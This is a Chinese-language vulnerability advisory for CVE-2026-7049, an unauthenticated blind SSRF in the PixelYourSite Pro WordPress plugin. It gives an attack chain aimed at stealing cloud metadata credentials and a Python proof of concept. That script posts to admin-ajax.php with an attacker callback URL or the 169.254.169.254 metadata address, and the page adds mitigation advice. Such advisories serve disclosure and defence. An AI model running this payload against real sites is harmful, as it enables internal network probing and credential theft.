CVE-2026-7049 CVSS 7.2 高危

CVE-2026-7049 WordPress插件PixelYourSite Pro SSRF漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7049

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PixelYourSite Pro WordPress插件

漏洞概述

PixelYourSite Pro WordPress插件在12.5.0.1及之前的所有版本中存在服务端请求伪造（SSRF）漏洞。该漏洞源于插件中的`scan_video`功能未对用户提供的URL进行严格限制。未经身份验证的攻击者可利用此漏洞诱导服务器向任意内部或外部网络位置发起请求。尽管这是一个盲SSRF（Blind SSRF），响应内容不会直接返回给攻击者，但攻击者仍可利用该漏洞探测内网服务、读取敏感元数据或结合其他攻击手段影响内部服务的机密性和完整性。

技术细节

该漏洞位于插件处理视频嵌入的代码逻辑中，具体涉及`includes/events/EmbeddedVideo.php`文件。当插件处理视频URL时，会调用相关函数获取视频信息以识别YouTube或Vimeo链接。代码在实现`scan_video`功能时，直接使用了用户可控的输入作为网络请求的目标地址，未进行有效的白名单校验或内网IP地址过滤。攻击者可以通过构造恶意的URL参数（如指向内网管理端口、云元数据服务或本地文件系统），迫使服务器端发起HTTP请求。由于系统仅解析响应内容中的特定视频模式并未返回完整Body，攻击者需利用带外（OOB）技术或时间延迟攻击来确认漏洞存在及利用结果。由于无需用户认证（PR:N）且攻击复杂度低（AC:L），该漏洞具有极高的被利用风险。

攻击链分析

STEP 1

侦察

攻击者识别目标站点是否安装了存在漏洞的PixelYourSite Pro插件（版本<=12.5.0.1）。

STEP 2

漏洞利用

攻击者向`/wp-admin/admin-ajax.php`发送特制的POST请求，在`scan_video`相关参数中填入内网地址（如127.0.0.1）或攻击者控制的OOB地址。

STEP 3

内网探测

由于是盲SSRF，攻击者观察OOB平台的回连请求或利用响应时间差异，判断内网端口是否开放或服务是否存在。

STEP 4

数据窃取

利用SSRF请求云厂商的元数据服务（如AWS 169.254.169.254）获取临时凭证，或对内部未授权接口进行数据操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7049 (Blind SSRF)
# This script sends a request to the vulnerable WordPress plugin to trigger an SSRF.

import requests

def exploit_ssrf(target_url, attacker_callback_url):
    # The endpoint is typically wp-admin/admin-ajax.php
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload data based on the 'scan_video' functionality
    # Action name might vary depending on plugin version hooks, this is a representative example
    payload = {
        "action": "pys_pro_event_video_scan", 
        "url": attacker_callback_url  # Attacker controlled URL or internal IP (e.g., http://169.254.169.254/latest/meta-data/)
    }
    
    try:
        print(f"[*] Sending SSRF request to {target_url}...")
        response = requests.post(endpoint, data=payload, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check your callback server for DNS/HTTP hits.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://victim-wordpress-site.com"
    # Replace with your Burp Collaborator or Interactsh URL
    callback = "http://oast.me/callback" 
    exploit_ssrf(target, callback)

影响范围

PixelYourSite Pro <= 12.5.0.1

防御指南

临时缓解措施

如果无法立即升级，建议临时禁用PixelYourSite Pro插件以阻断攻击路径。同时检查服务器日志，确认是否存在针对内网地址的异常扫描记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表